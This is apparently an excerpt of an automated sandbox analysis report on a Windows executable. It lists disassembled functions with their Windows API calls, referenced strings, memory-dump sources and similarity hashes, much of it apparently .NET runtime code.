Instruction ID: 2afe7fa4e4b971ddb60bf353c2f4627832cf42cda5ec3ead7c5006241bcf4498
Opcode Fuzzy Hash: 683153db836d0f3d2ad473b0c8370fc9065c8b4cf9e90d9235b8ccba40c1012e
Instruction Fuzzy Hash: 2851CE72A007219FDB219F6EEC04B2AB7F4EF44714F148678E8599B3A1DB71E814CB91

Function 00972CA0 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0071F1C0: HeapFree.KERNEL32(00000000,?,80131623,?,?,00000002), ref: 0071F1FD

Part of subcall function 0071F1C0: HeapFree.KERNEL32(00000000,?,80131623,?,?), ref: 0071F25E

HeapFree.KERNEL32(00000000,00C731C4,00000002,00000002,BBFE6088), ref: 00972D72
HeapFree.KERNEL32(00000000,00C731C4,00000002), ref: 00972EA8
HeapFree.KERNEL32(00000000,00C731C4,000010FF,00000000,?,00000010,00DB62AC,00DB62AC,00DB62AC,00DB62AC,00DB62AC,00DB62AC,00DB62AC,00DB62AC,00DB62AC,00DB62AC), ref: 00972ECB

Strings

0x%.8X, xrefs: 00972E46
(%s), xrefs: 00972E63

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID: (%s)$0x%.8X
API String ID: 3298025750-4175617291
Opcode ID: 688c3ceefc5fca6eadb475d07aa005ec6b23cfefd14f66d4284dbb0144458f86
Instruction ID: 988f7beeb5dedd14ce9443d055b9b9a0f671fe6f068e15608f7cbd27c9aa3b05
Opcode Fuzzy Hash: 688c3ceefc5fca6eadb475d07aa005ec6b23cfefd14f66d4284dbb0144458f86
Instruction Fuzzy Hash: A05165B2D10249DBDF10CFA4D9497EEBBB8AF44314F148129E814B72C1D7B99E44DBA0

Function 00828740 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?), ref: 00828874
HeapFree.KERNEL32(00000000,00000000,BBFE6088,00000000,?), ref: 008288A7

Part of subcall function 0071F800: wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,00000004,00000000,BBFE6088,?,?), ref: 0071F88C

Part of subcall function 007EACC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(DynamicClass,BBFE6088,?,?), ref: 007EAD0D
Part of subcall function 007EACC0: HeapFree.KERNEL32(00000000,?,?,?,ILStubClass,BBFE6088,?,?), ref: 007EADA7
Part of subcall function 007EACC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00D028A8,?,?), ref: 007EADE1

HeapFree.KERNEL32(00000000,?), ref: 00828928

Part of subcall function 0097D690: HeapFree.KERNEL32(00000000,?,?,?), ref: 0097D7A8

Part of subcall function 007EB5B0: GetConsoleOutputCP.KERNEL32(00000000,?,000000FF,00000000,00000200,00000000,00000000,BBFE6088), ref: 007EB6E1
Part of subcall function 007EB5B0: WideCharToMultiByte.KERNEL32(00000000), ref: 007EB6E8
Part of subcall function 007EB5B0: HeapFree.KERNEL32(00000000,00000000), ref: 007EB726

Part of subcall function 007EB550: GetStdHandle.KERNEL32(000000F4,00000000,?), ref: 007EB55C
Part of subcall function 007EB550: strlen.API-MS-WIN-CRT-STRING-L1-1-0(Fatal error. ), ref: 007EB566
Part of subcall function 007EB550: WriteFile.KERNEL32(00000000,Fatal error. ,00007FFF,?,00000000,00000000), ref: 007EB595

Strings

--------------------------------, xrefs: 008287FA, 00828880
Repeat %d times:, xrefs: 008287DC

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap$strlen$ByteCharConsoleFileHandleMultiOutputWideWritewcscpy_s
String ID: --------------------------------$Repeat %d times:
API String ID: 3147432761-2686560479
Opcode ID: 398f93715718f00e6d993641da65eda48ff013ce576406efd35bceb4c2916d5b
Instruction ID: cad586502e3f4b593e57534f690e77bc42aeb17361d58092f1d0615d9070e010
Opcode Fuzzy Hash: 398f93715718f00e6d993641da65eda48ff013ce576406efd35bceb4c2916d5b
Instruction Fuzzy Hash: 38515C71902248EFDB10EFA9D989B9EBBB4FF04300F544228E815AB2D1DB74A955CB91

Function 00A331A0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 147memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,00000000,?,00000000), ref: 00A3322F
HeapAlloc.KERNEL32(03400000,00000000,00000018,?,00000000,?,00000000), ref: 00A3324C
GetProcessHeap.KERNEL32(?,00000000,?,00000000), ref: 00A332FB
HeapAlloc.KERNEL32(03400000,00000000,00000018,?,00000000,?,00000000), ref: 00A33318

Strings

ipc_stream_factory_build_and_add_port - Ignoring LISTEN port configuration, xrefs: 00A331D7

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Heap$AllocProcess
String ID: ipc_stream_factory_build_and_add_port - Ignoring LISTEN port configuration
API String ID: 1617791916-1770569030
Opcode ID: 47326a0b40a0fd7221a86905d97d61019b655ffefbe80172a4d8e5025b83b076
Instruction ID: 8fd86204446950ecb6ddd7f983b142eea86ed9370e9dd304ecc0cb1eadc2ec32
Opcode Fuzzy Hash: 47326a0b40a0fd7221a86905d97d61019b655ffefbe80172a4d8e5025b83b076
Instruction Fuzzy Hash: D751E472B04342DBDB20DF69D880B6AB7E0EFA5310F10826DF945DB341EBB1E9818790

Function 007EB5B0 Relevance: 7.6, APIs: 5, Instructions: 144memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,00000000,BBFE6088), ref: 007EB66C
HeapFree.KERNEL32(00000000,00000000,BBFE6088), ref: 007EB6AA
GetConsoleOutputCP.KERNEL32(00000000,?,000000FF,00000000,00000200,00000000,00000000,BBFE6088), ref: 007EB6E1
WideCharToMultiByte.KERNEL32(00000000), ref: 007EB6E8
HeapFree.KERNEL32(00000000,00000000), ref: 007EB726

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap$ByteCharConsoleMultiOutputWide
String ID:
API String ID: 1200818624-0
Opcode ID: df551917955f4ca21a7e8c70288eb6553de4c7f1a88875a1a1643b6a274557eb
Instruction ID: beca65c1ac0e46e969202665c80ccfbf89a553650cbbe95adb137ebbe45ce53c
Opcode Fuzzy Hash: df551917955f4ca21a7e8c70288eb6553de4c7f1a88875a1a1643b6a274557eb
Instruction Fuzzy Hash: 2A51E634A41258DBEF209F65DC8879EBBB4FB88710F9042E9E519A77D1C7789E408F84

Function 0088BEC0 Relevance: 7.6, APIs: 5, Instructions: 136threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,0088BCF0,00000000,00000000,00000000), ref: 0088BF43
GetLastError.KERNEL32 ref: 0088BF75
LeaveCriticalSection.KERNEL32(00000000), ref: 0088BFAB
CloseHandle.KERNEL32(00000000), ref: 0088C013
LeaveCriticalSection.KERNEL32(00000000,BBFE6088,00000000,?,00000000), ref: 0088C031

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: CriticalLeaveSection$CloseCreateErrorHandleLastThread
String ID:
API String ID: 4096589887-0
Opcode ID: b95cab76ffa8dbe7dd11c45602984bf1ad431db70bbd01bcf9ad75e188ae4ac0
Instruction ID: 2ca11730a88e01688d727d1e7620b1b2d8f5f81f0e6687be2abc8ffc8897cbba
Opcode Fuzzy Hash: b95cab76ffa8dbe7dd11c45602984bf1ad431db70bbd01bcf9ad75e188ae4ac0
Instruction Fuzzy Hash: 73519071900745DFDB20DF69C848BAEBBB4FB85764F14421AE824E73D1CB759940CBA0

Function 00982D40 Relevance: 7.6, APIs: 5, Instructions: 133registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,00000000,BBFE6088,?), ref: 00982DD1
RegCloseKey.ADVAPI32(00000000), ref: 00982EB1

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: CloseOpen
String ID:
API String ID: 47109696-0
Opcode ID: 8e839db1bea93ccf0cfe71dab8a07d8e87675b437e65b4ebb1481c45dc09badb
Instruction ID: a6123e3c37085e2e36252ab2b00e185abd62c9ee4a79a962e39e48e59d432033
Opcode Fuzzy Hash: 8e839db1bea93ccf0cfe71dab8a07d8e87675b437e65b4ebb1481c45dc09badb
Instruction Fuzzy Hash: 31417271E042199BEB14DF94CD05BEEB7F8FB48714F10426AE901BB381D7795E048BA8

Function 00A32D80 Relevance: 7.6, APIs: 6, Instructions: 129memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00A330C9,000000FF,00000000,00000000,00000000,00000000,00000000), ref: 00A32DB8
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00A32DC8
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00A330C9,000000FF,00000000,00000000), ref: 00A32DE3
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00A32DF2
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00A32EA5
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00000000,00000000), ref: 00A32EB3

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: ByteCharMultiWidefree$FreeHeapmalloc
String ID:
API String ID: 3875093398-0
Opcode ID: e1842459371df59f685499a1ae5246b2739b0ad4559461d016861354b411dde7
Instruction ID: d42feee11be7ee2ffeeb874ac5a77a6b344c3754f4cd5c831ed62ca29de8e3d3
Opcode Fuzzy Hash: e1842459371df59f685499a1ae5246b2739b0ad4559461d016861354b411dde7
Instruction Fuzzy Hash: E2419271D00209ABDB10DF65DC45BEFBBB8EF48710F544629F815B7290EB70AA04CBA5

Function 00A2C170 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 127memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A27990: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000010,?,00A2826F,BBFE6088,?,00000000), ref: 00A27995

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(0000000C,00000000,00000004,00000000), ref: 00A2C187
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00A28F0E), ref: 00A2C195

Part of subcall function 00A2C690: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00DB06B0,00000000,00A2C4F8,00000000,00000000,00000000,00000000,00000000), ref: 00A2C6DB
Part of subcall function 00A2C690: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00DB06B0,00000000,00A2C4F8,00000000,00000000,00000000,00000000,00000000), ref: 00A2C6EC

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00000000,00000000), ref: 00A2C212
HeapFree.KERNEL32(00000000,03418958,?,?,?,?,?,?,?,?,?,?,?,?,?,00A28F0E), ref: 00A2C263

Strings

Microsoft-DotNETCore-EventPipeConfiguration, xrefs: 00A2C1D2

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: free$malloc$FreeHeap
String ID: Microsoft-DotNETCore-EventPipeConfiguration
API String ID: 2120179596-2204440910
Opcode ID: b3c3b5cc5cbc3e393e53250d2cb94eabb51241eae02a44e2852a513b66f19073
Instruction ID: fc1808890b5fd37f9ac49f9035af70db1a820254c237a3a815a2dae33ac3dfd3
Opcode Fuzzy Hash: b3c3b5cc5cbc3e393e53250d2cb94eabb51241eae02a44e2852a513b66f19073
Instruction Fuzzy Hash: 6341C270600720DBE724BFACE9557AEBBA5AF80714F004538E9469B392DF71E914CBA1

Function 00A27750 Relevance: 7.6, APIs: 5, Instructions: 127memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(03439290,03439290,?,00A304C7,03439290,03439290,?,00A2837B,03439290,?,00000001,?,00000000,00000000), ref: 00A27761
HeapAlloc.KERNEL32(03400000,00000000,00000120,03439290,03439290,?,00A304C7,03439290,03439290,?,00A2837B,03439290,?,00000001,?,00000000), ref: 00A2777C
GetCurrentThreadId.KERNEL32 ref: 00A277CE
GetProcessHeap.KERNEL32 ref: 00A2783E
HeapAlloc.KERNEL32(03400000,00000000,00000004), ref: 00A2785B

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Heap$AllocProcess$CurrentThread
String ID:
API String ID: 1689990691-0
Opcode ID: bf9b9845f1f47507c63af8aa46a04bffa7b262f6739af1bf36856a2a8f609a0e
Instruction ID: d06c1baea6b15c56b154030517b00e11f0451e112df9e786560c9929e4062cef
Opcode Fuzzy Hash: bf9b9845f1f47507c63af8aa46a04bffa7b262f6739af1bf36856a2a8f609a0e
Instruction Fuzzy Hash: 4341A171704321DBE7229B78EC89B9E73E0AF55711F140138EA55973C1EBB4AA80CBA5

Function 0097F100 Relevance: 7.6, APIs: 5, Instructions: 114COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(000001FF,00000003,00000000,00000002,00000002,?,00000002,?,0097F2D7,00000002,?), ref: 0097F174
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 0097F1A4
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0097F1AF
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0097F1BA
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0097F1C5

Part of subcall function 007EB3C0: __stdio_common_vsnprintf_s.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000200,00000002,00000000,00000002,?,0097F19D,000000FF,00000200,?,00000002,?,00000002), ref: 007EB3DD

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: _errno$__stdio_common_vsnprintf_s
String ID:
API String ID: 2452351950-0
Opcode ID: b2459e471d74ecfb86fab761a0e402469695eda5918b0fbe006dba16713f6612
Instruction ID: 2b74426015b63b56ce6c15bee34e24e8458928a7f7b00dec9f3d580b6696c2ad
Opcode Fuzzy Hash: b2459e471d74ecfb86fab761a0e402469695eda5918b0fbe006dba16713f6612
Instruction Fuzzy Hash: D6312433204204EFD7299F56DC15B7A77AAEFC5321F148128F95E971A0DE71AD80CA21

Function 00749A30 Relevance: 7.6, APIs: 6, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?), ref: 00749A85
HeapFree.KERNEL32(00000000,?), ref: 00749AB2
HeapFree.KERNEL32(00000000,?), ref: 00749ADF
HeapFree.KERNEL32(00000000,?), ref: 00749B09
HeapFree.KERNEL32(00000000,?), ref: 00749B33
HeapFree.KERNEL32(00000000,?), ref: 00749B5D

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 71a515227263a5a18e73c4e8d1021049d36bffce8acb6d9c19577eb19dd6adf0
Instruction ID: f152a6de3f3ad5e136867e182ae95abdd8ad9e960f4f6e0636d2db2c252626db
Opcode Fuzzy Hash: 71a515227263a5a18e73c4e8d1021049d36bffce8acb6d9c19577eb19dd6adf0
Instruction Fuzzy Hash: 1C418F70605388DEEB11CB68DD48B9EBBF8AB05314F18C1A9E944E73A1D7789E08C761

Function 00986420 Relevance: 7.6, APIs: 5, Instructions: 100processmemoryCOMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000000E,BBFE6088,?,?,?,000000FF), ref: 0098649C
CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000001,?,00000000,00000000,?,?,?,?,?,000000FF), ref: 009864EC
GetLastError.KERNEL32 ref: 009864F4
HeapFree.KERNEL32(00000000,00000000), ref: 00986511
SetLastError.KERNEL32(00000000), ref: 00986522

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: ErrorLast$CreateFreeHeapProcess
String ID:
API String ID: 503317581-0
Opcode ID: d00d4a888747c1018aaf9f815fb6fb7de750ae00c8ff84b79fb8d0ce11cc4842
Instruction ID: 0a88b261f02a297812eedeab762041ec636c9d2128d4f5a2577df2c9e0b0c0bd
Opcode Fuzzy Hash: d00d4a888747c1018aaf9f815fb6fb7de750ae00c8ff84b79fb8d0ce11cc4842
Instruction Fuzzy Hash: 21319576A00344ABDB20DFA9DD45BAEBBF9FB49710F10422AF915E73D0D7B55A008B50

Function 009747A0 Relevance: 7.6, APIs: 5, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009741F0: wcscat_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000040,00D13F5C), ref: 009742C7
Part of subcall function 009741F0: wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000040,COMPlus_), ref: 0097438E
